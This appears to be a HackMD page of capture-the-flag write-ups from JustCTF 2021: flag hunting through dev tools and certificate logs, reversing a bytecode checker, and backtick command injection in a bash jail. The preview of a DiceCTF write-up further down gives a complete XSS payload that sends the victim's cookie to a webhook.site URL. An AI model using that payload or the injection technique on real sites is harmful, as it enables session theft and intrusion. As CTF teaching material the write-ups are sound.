Try โ€‚โ€‰HackMD

JustCTF

This competition was on 30 - 31 January 2021. We placed 90th/804.

Sanity Check

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More โ†’

The Sanity Check was slightly tricky. The challenge had to do something with the CTF website itself as the description said. So at the challenge URL, I went to the Network tab under Chrome Dev Tools and hit the record button. I reloaded the challenge to load the network requests and pressed ctrl-f to search for the flag format (justCTF) among the requests.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More โ†’

The flag was in the first request, justCTF{something_h3re!}.

Forgotten name

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More โ†’

I googled secret domain name ctf and came across two relevant writeups, writeup 1 and writeup 2.

I used the tool described in writeup 1, the Google Transparency Report, to find other possible subdomains under 2020.justctf.team.

From the search result, I saw

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More โ†’

I enumerated domains related to jctf.pro and discovered http://6a7573744354467b633372545f6c34616b735f6f3070737d.web.jctf.pro/. I converted 6a... from hex to ascii and got the flag

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More โ†’

That's not crypto

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More โ†’

We were given a pyc file, which is the bytecode of a Python file. Using the command uncompyle6 checker.pyc > checker.py (you can install uncompyle6 using pip), I converted it to a Python file which is hosted as checker.py due to the line limits here.

Analyzing the poly function, I found that poly(a, x) is equal to

aixn+aiโˆ’1xnโˆ’1+...+a0, where
a and
x are both arrays and
n is the length of
a. We're given both
a and the result of the polynomial,
24196561, so all I had to do was run a polynomial solver and other basic reversing tricks to get the original value of the flag. The solution, written in SageMath, is sol.sage.

Flag: justCTF{this_is_very_simple_flag_afer_so_big_polynomails}

My Little Pwny

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More โ†’

I was given access to a server and port. Upon connecting, I tried inputting random characters to see what they would do. Some would be rejected, and others would be echoed. A particular character, the backtick, would make the program display an error message. I realized that this occurs when you write unsanitized bash that doesn't escape the backtick.

The original program must have looked like echo your_input . When you escape out of this context, you can force the command to be whatever you want. For example, echo `ls` will execute ls only.

I tried `cat flag` but that wouldn't work. I googled bash jail escape ctf and found this article.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More โ†’

25519 - Solved

Last changed by 
โ€‰
ntropy team
0
265

Read more

Angstrom CTF 2021

Notes about this CTF will be super brief since there's so many challenges and I don't have the patience to writeup all of them. If you really have trouble understanding though, I promise to work with you at luconfident#3198 on Discord as long as you contact me before May 2021 Crypto Problems We are given all the variables, n, p, q, e, and c in RSA. So decrypting the message is straightforward. sol.py cipher = bytes.fromhex("ae27eb3a148c3cf031079921ea3315cd27eb7d02882bf724169921eb3a469920e07d0b883bf63c018869a5090e8868e331078a68ec2e468c2bf13b1d9a20ea0208882de12e398c2df60211852deb021f823dda35079b2dda25099f35ab7d218227e17d0a982bee7d098368f13503cd27f135039f68e62f1f9d3cea7c")

Apr 8, 2021
VolgaCTF Qualifiers

Knock-Knock Above is the picture of the challenge on the site. Below are the files linked. knock.pcap link task.py import os import time

Mar 31, 2021
Union CTF

We played on 19 Feb 2021 and placed 66th / 466. Mordell Prime We are given mordell_primes.sage below and an output.txt that has the values of $N$ and $c$. from Crypto.Util.number import bytes_to_long from secrets import k, FLAG assert k < 2^128 assert FLAG.startswith(b'union{')

Feb 27, 2021
DiceCTF 2021

This competition was on 5 - 7 Feb 2021. We placed 157th / 1059. Babier CSP HTML ended up being executed directly on a webpage through a get parameter (name), but script tags weren't. After I added the fixed CSP nonce to the script tag, I was able to achieve a reflected XSS. Webhook.site is a site which allows the logging of the HTTP requests to itself, which I used to recover the secret cookie and ultimately the flag. The complete payload was https://babier-csp.dicec.tf/?name=%3Cscript%20nonce=%22LRGWAXOY98Es0zz0QOVmag==%22%20src=%22https://webhook.site/e5a244d7-94d3-40f8-899e-e268de336024?cookie=%22%2Bdocument.cookie%3E%3C/script%3E babymix

Feb 27, 2021
Read more from ntropy team
Published on HackMD